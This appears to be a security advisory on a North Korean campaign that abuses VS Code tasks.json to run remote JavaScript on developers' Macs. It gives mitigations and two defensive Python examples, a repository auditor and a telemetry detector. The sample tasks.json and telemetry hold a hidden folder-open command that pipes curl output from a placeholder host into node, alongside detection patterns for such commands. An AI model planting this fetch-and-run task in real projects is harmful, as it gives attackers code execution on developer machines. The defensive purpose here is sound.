VS Code Exploited by DPRK Hackers: New Backdoor Attack Discovered
Summary:
The Contagious Interview campaign, attributed to a North Korean (DPRK) state-sponsored threat actor under the Lazarus APT umbrella, has evolved to use a more sophisticated infection chain aimed at software developers. Jamf Threat Labs has continued to monitor Contagious Interview since its last published research on the cluster and has released a further analysis covering December 2025 activity, which documents a delivery technique used alongside the previously documented ClickFix tactics. This variant abuses Visual Studio Code task configuration files (tasks.json) to execute a payload on the victim's system.
The campaign relies on social engineering: victims are coaxed into cloning and opening malicious Git repositories hosted on GitHub or GitLab, typically under the guise of a job recruitment process or technical assessment. Once the victim opens the repository in Visual Studio Code and accepts the prompt to trust the workspace author, VS Code processes the repository's .vscode/tasks.json; a task configured to run automatically on folder open then launches a background shell command on macOS that fetches a remote JavaScript payload and pipes it straight into the Node.js runtime. The payload is never written to disk, and it gives the attacker arbitrary JavaScript execution and a foothold for persistent C2 communication for as long as the implant process is running.
Security Officer Comments:
The campaign shows DPRK-sponsored operators moving toward abuse of trusted developer tooling such as VS Code and Node.js, and code analysis suggests the malware was written with AI assistance. The implant's core is a persistent loop that fingerprints the host (hostname, MAC addresses, OS details) and polls a command-and-control (C2) server every five seconds. It exposes Node.js's require() function to the operator, so the C2 can dynamically load Node.js modules and execute arbitrary attacker-supplied JavaScript, giving full remote code execution (RCE). The activity specifically targets macOS environments.
The most recent evolution, observed in January 2026, is the deployment of a fully functional backdoor implant. This poses a high risk to development environments: adversaries can steal sensitive intellectual property and use compromised developer workstations to pivot further into corporate networks.
Suggested Corrections:
IOCs are available in Jamf Threat Labs’ article.
The following mitigation strategies are derived from the guidance provided in the report, aligned with the NIST CSF 2.0:
- Identify (ID):
  - Maintain asset inventories of developer workstations and the tools installed on them (e.g., VS Code, Node.js).
  - Assess the risk of third-party code repositories and of recruitment processes that involve technical take-home tasks.
- Protect (PR):
  - Endpoint defense: ensure Threat Prevention and Advanced Threat Controls are enabled and set to block mode (the report calls this out specifically for Jamf on macOS).
  - Workflow verification: developers must review repository contents, specifically .vscode/tasks.json, package.json and any install scripts, before marking a repository as trusted in Visual Studio Code.
  - Supply chain security: only run npm install on projects that have been thoroughly vetted, since npm lifecycle scripts execute during installation.
- Detect (DE):
  - Monitor for unusual child processes spawned by Visual Studio Code, particularly shells launched with nohup bash -c or commands that invoke curl and pipe the result into node.
  - Detect persistent network beaconing to the C2 identifiers listed in the report, and unusual requests to external IP-resolution services such as ipify[.]org.
- Respond (RS):
  - Isolate hosts immediately on detection of the backdoor implant or of unauthorized C2 communication.
  - Analyze the hard-coded identifiers in the recovered malware to determine the scope of the infection session.
- Recover (RC):
  - Reimage compromised workstations to remove the persistent execution loop and any secondary payloads deployed through the RCE capability.
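A pre-trust audit of the two files the Protect item above names, .vscode/tasks.json and package.json, written as an added example for this page (it is not code from the Jamf report or from the campaign's tooling). It parses a cloned repository's task definitions, flags any task set to run automatically on folder open (VS Code's "runOptions": {"runOn": "folderOpen"}, the mechanism described in the Summary), and lists npm lifecycle scripts that execute during npm install. The sample repository it writes to a temporary directory, the placeholder host example.invalid and the suspicious-token list are constructed assumptions for illustration.

```python
"""Pre-trust audit for a cloned repository (added example, not Jamf's code).

Checks the two files the report tells developers to review before trusting a
workspace: .vscode/tasks.json (VS Code runs a task on folder open when it has
"runOptions": {"runOn": "folderOpen"}) and package.json (npm runs lifecycle
scripts during `npm install`). Sample contents and the token list are assumptions.
"""
import json
import os
import re
import tempfile

AUTO_RUN = "folderOpen"
NPM_LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Tokens matching the delivery pattern in the report (detached shell fetching
# remote JavaScript into node) plus common obfuscation helpers. Assumed list.
SUSPICIOUS = re.compile(
    r"\bnohup\b|\bcurl\b|\bwget\b|\|\s*(node|bash|sh|python3?)\b"
    r"|\bbase64\b|\beval\b|\bnode\s+-e\b",
    re.IGNORECASE,
)


def _strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments: drop block comments, full-line //
    comments and trailing commas so json.loads accepts it. Inline // comments
    are left alone because they would collide with https:// in commands."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"(?m)^[ \t]*//.*$", "", text)
    return re.sub(r",(\s*[}\]])", r"\1", text)


def _task_commands(task: dict) -> list:
    """Command line of a task plus any per-platform override (osx/linux/windows)."""
    cmds = []
    for scope in (task, task.get("osx"), task.get("linux"), task.get("windows")):
        if isinstance(scope, dict) and scope.get("command"):
            parts = [str(scope["command"])] + [str(a) for a in scope.get("args", [])]
            cmds.append(" ".join(parts))
    return cmds


def audit_tasks(path: str) -> list:
    """Findings for .vscode/tasks.json: auto-run tasks and suspicious commands."""
    findings = []
    if not os.path.exists(path):
        return findings
    with open(path, encoding="utf-8") as fh:
        raw = fh.read()
    try:
        data = json.loads(_strip_jsonc(raw))
    except json.JSONDecodeError:
        return [f"{path}: could not parse; review it manually before trusting"]
    for task in data.get("tasks", []):
        label = task.get("label", "<unlabelled>")
        run_on = (task.get("runOptions") or {}).get("runOn")
        for cmd in _task_commands(task) or ["<no shell command; check type/script>"]:
            if run_on == AUTO_RUN:
                findings.append(f"tasks.json: task '{label}' runs on folder open: {cmd}")
            if SUSPICIOUS.search(cmd):
                findings.append(f"tasks.json: task '{label}' has suspicious tokens: {cmd}")
    return findings


def audit_package_json(path: str) -> list:
    """Findings for package.json: lifecycle hooks that run during npm install."""
    findings = []
    if not os.path.exists(path):
        return findings
    with open(path, encoding="utf-8") as fh:
        scripts = json.load(fh).get("scripts", {})
    for hook in NPM_LIFECYCLE:
        if hook in scripts:
            tag = " (suspicious tokens)" if SUSPICIOUS.search(scripts[hook]) else ""
            findings.append(f"package.json: '{hook}' runs during npm install{tag}: {scripts[hook]}")
    return findings


def audit_repo(root: str) -> list:
    return (audit_tasks(os.path.join(root, ".vscode", "tasks.json"))
            + audit_package_json(os.path.join(root, "package.json")))


# Constructed sample repository mirroring the delivery pattern the report
# describes; example.invalid is a placeholder, not a real payload host.
SAMPLE_TASKS = """{
  // VS Code accepts comments here, and a long file can bury the task below
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "prepare-env",
      "type": "shell",
      "command": "nohup bash -c 'curl -s https://example.invalid/p.js | node' >/dev/null 2>&1 &",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}
"""
SAMPLE_PACKAGE = json.dumps({
    "name": "take-home-task", "version": "1.0.0",
    "scripts": {"test": "jest", "postinstall": "node ./scripts/setup.js"},
})


def write_sample_repo(root: str) -> None:
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_TASKS)
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_PACKAGE)


def demo() -> list:
    """Audit the constructed sample repository and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        write_sample_repo(root)
        return audit_repo(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it against a real clone with audit_repo(path) before clicking "Trust" in the Workspace Trust prompt; a task that hides its terminal ("reveal": "never") and runs on folder open deserves the same scrutiny as a postinstall hook, whatever its command looks like.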
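Detection logic for the two Detect items above and for the five-second polling loop described in the Security Officer Comments, as an added example that is not from the Jamf report: it runs a parent-process check, an IP-lookup check and a beacon-periodicity check over a constructed batch of newline-delimited JSON telemetry. The event schema, the assumption that VS Code's macOS processes report names beginning with "Code", and every sample value (pids, the 203.0.113.10 C2 address, timestamps, the example.invalid URL) are assumptions to be mapped onto a real EDR/NDR feed.

```python
"""Detection rules for the VS Code delivery chain (added example, not Jamf's code).

Runs over newline-delimited JSON process and network events. Field names, the
VS Code parent-process naming and all sample values are assumptions.
"""
import json
import re
import statistics
from collections import defaultdict

# Assumption: VS Code's own processes on macOS report names beginning with
# "Code" (e.g. "Code Helper (Plugin)"); adjust to your telemetry source.
VSCODE_PARENT = re.compile(r"^Code\b")
# Delivery pattern from the report: a detached shell fetching remote JS into node.
DELIVERY = re.compile(r"\bnohup\b|\bcurl\b.*\|\s*node\b|\bwget\b.*\|\s*node\b", re.I)
# External IP-resolution services; the report names ipify, the rest are assumed.
IP_LOOKUP = ("ipify.org", "icanhazip.com", "ifconfig.me")

# Constructed telemetry: a benign git child of VS Code, the delivery shell, the
# resulting node process doing an IP lookup and then polling a C2 every ~5 s,
# and an unrelated npm process talking to the registry at irregular times.
SAMPLE_EVENTS = r"""
{"ts": 0.0, "type": "process", "pid": 5000, "ppid": 4242, "parent_name": "Code Helper (Plugin)", "name": "git", "cmdline": "git status --porcelain"}
{"ts": 1.0, "type": "process", "pid": 5001, "ppid": 4242, "parent_name": "Code Helper (Plugin)", "name": "bash", "cmdline": "bash -c \"curl -s https://example.invalid/p.js | node\""}
{"ts": 1.5, "type": "network", "pid": 5003, "name": "npm", "dst": "registry.npmjs.org:443"}
{"ts": 1.7, "type": "network", "pid": 5003, "name": "npm", "dst": "registry.npmjs.org:443"}
{"ts": 2.0, "type": "process", "pid": 5002, "ppid": 5001, "parent_name": "bash", "name": "node", "cmdline": "node"}
{"ts": 3.0, "type": "network", "pid": 5002, "name": "node", "dst": "api.ipify.org:443"}
{"ts": 4.0, "type": "network", "pid": 5002, "name": "node", "dst": "203.0.113.10:8080"}
{"ts": 6.0, "type": "network", "pid": 5003, "name": "npm", "dst": "registry.npmjs.org:443"}
{"ts": 9.1, "type": "network", "pid": 5002, "name": "node", "dst": "203.0.113.10:8080"}
{"ts": 13.9, "type": "network", "pid": 5002, "name": "node", "dst": "203.0.113.10:8080"}
{"ts": 19.0, "type": "network", "pid": 5002, "name": "node", "dst": "203.0.113.10:8080"}
{"ts": 24.1, "type": "network", "pid": 5002, "name": "node", "dst": "203.0.113.10:8080"}
{"ts": 29.0, "type": "network", "pid": 5002, "name": "node", "dst": "203.0.113.10:8080"}
"""


def parse_events(text: str) -> list:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def suspicious_vscode_children(events: list) -> list:
    """Processes whose parent is VS Code and whose command line matches delivery."""
    alerts = []
    for e in events:
        if e.get("type") != "process":
            continue
        if VSCODE_PARENT.match(e.get("parent_name", "")) and DELIVERY.search(e.get("cmdline", "")):
            alerts.append({"rule": "vscode-child-delivery", "pid": e["pid"], "cmdline": e["cmdline"]})
    return alerts


def ip_lookup_from_interpreter(events: list) -> list:
    """Interpreters or shells contacting an external IP-resolution service."""
    alerts = []
    for e in events:
        if (e.get("type") == "network" and e.get("name") in ("node", "bash", "sh")
                and any(svc in e.get("dst", "") for svc in IP_LOOKUP)):
            alerts.append({"rule": "ip-lookup", "pid": e["pid"], "dst": e["dst"]})
    return alerts


def beacons(events: list, min_hits: int = 5, jitter: float = 0.5) -> list:
    """(pid, dst) pairs with at least min_hits connections at a near-constant
    interval; the report's implant polls its C2 every five seconds."""
    by_pair = defaultdict(list)
    for e in events:
        if e.get("type") == "network":
            by_pair[(e["pid"], e["dst"])].append(float(e["ts"]))
    alerts = []
    for (pid, dst), times in by_pair.items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        if max(abs(g - period) for g in gaps) <= jitter:
            alerts.append({"rule": "periodic-beacon", "pid": pid, "dst": dst,
                           "period_s": round(period, 1), "hits": len(times)})
    return alerts


def run_demo() -> list:
    """Apply all three rules to the constructed telemetry and return the alerts."""
    events = parse_events(SAMPLE_EVENTS)
    return suspicious_vscode_children(events) + ip_lookup_from_interpreter(events) + beacons(events)


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The periodicity rule deliberately keys on cadence rather than on destination, so it still fires when the C2 address differs from the report's IOCs; tune min_hits and jitter to your environment, since legitimate agents also poll on fixed intervals and the process-tree and IP-lookup rules are what distinguish this chain.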
https://www.jamf.com/blog/threat-actors-expand-abuse-of-visual-studio-code/